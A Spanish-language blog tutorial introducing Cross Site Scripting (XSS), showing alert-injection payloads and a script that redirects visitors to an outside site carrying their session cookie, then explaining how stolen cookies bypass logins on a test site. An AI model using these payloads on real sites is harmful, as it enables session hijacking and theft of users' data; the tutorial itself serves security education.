En el dia de hoy hablaremos de un ataque bastante comun en aplicaciones web, el ataque es conocido comno XSS o Cross Site Scripting.
¿Que es Cross Site Scripting?
Es un metodo de ataque que permite al atacante inyectar codigo JavaScript en un sitio web mediante formularios, este ataque es ideal para aplicaciones web que utilizan JavaScript y puede resultar ser bastante peligroso para el funcionamiento de nuestra web.
algunas de las cosas que el atacante puede realizar es introducir alerts con diferentes mensajes que posteriormente cualquier persona que ingrese al sitio vizualizara ese mensaje. o en casos mas concretos podriamos por ejemplo hacer un redireccionamiento de URL, de forma que cuando la victima ingrese al sitio sera redigirido automaticamente a otro enlace.
Generalmente estos ataques son ejecutados por hackers con intenciones de robar Cookies o dañar el sitio victima, ya sea que simplemente quieran robar la informacion de sus usuarios o que quieran hacer SPAM para redigirir el trafico del sitio a otro sitio diferente.
A continuacion vamos a darte algunos ejemplos clasicos de XSS que los atacantes pueden utilizar en formularios de tu web.
<body onload=alert(‘Sitio hackeado’)>;
<script>alert('Sitio hackeado')</script>
<script>
window.location='http:/facundosalgado.com/?cookie='+document.cookie
</script>
En los ejemplos de arriba, podemos ver ejemplos clasicos de XSS que los hackers normalmente utilizan cuando encuentran un sitio vulnerable, y se veria de la siguiente, manera, en este caso tenemos montado un sitio web de prueba para pentesting que es vulnerable a este tipo de ataques, y en un formulario donde podemos enviar datos, introducimos el codigo JavaScript adentro de la siguiente forma
En este caso en el recuadro del formulario estamos inyectando un alert para que nos muestre un mensaje en el navegador con el texto “hackeado” esto producira que cuando demos click en el boton sumit, haya una inyeccion de codigo JavaScript dentro del sitio, de modo que cada visitante que vaya a ese sitio de la web le aparecera el siguiente alert que hemos inyectado:
Aca podemos ver otro ejemplo y hacemos un redireccionamiento de URL del sitio, de modo que cada visitante que ingrese a esa seccion determinada de la web, sera automaticamente redirigida a otro enlace que nosotros colocamos en el codigo JavaScript
lo que colocamos en ese codigo es lo siguiente:
<script>
window.location='http:/facundosalgado.com/?cookie='+document.cookie
</script>
Lo que estamos indicando es que las personas seran redigirdas al enlace que colocamos alli con el Cookie de la seccion de la victima, entonces estamos enviado a nuestra pagina con el cookie de la anterior pagina donde el visitante visito, el resultado seria algo parecido a esto
Como ven hemos logrado que redigir a la persona a nuestro sitio y mandandonos sus cookies del anterior sitio, estos cookies pueden servirnos por ejemplo para evadir o introducirnos en una seccion donde se requiera una auntenticacion, por ejemplo un sitio que nesesita loguearse a travez de un usuario y contraseña, de esta forma estamos capturando sus cookies y mandandolo a nuestro sitio, que posteriormente puede usarse esas cookies capturadas para iniciar seccion en su sitio sin nesesidad de usar una clave de auntentificacion.
Como veran estos metodos de ataque son bastante viejos pero son importantes de saber corregirlos si tenemos algun sitio que tengamos en mente desarrollar, ya que puedar resultar perjudicial para nuestro sitio.
 Ataques comunes a aplicaciones web){kind=link}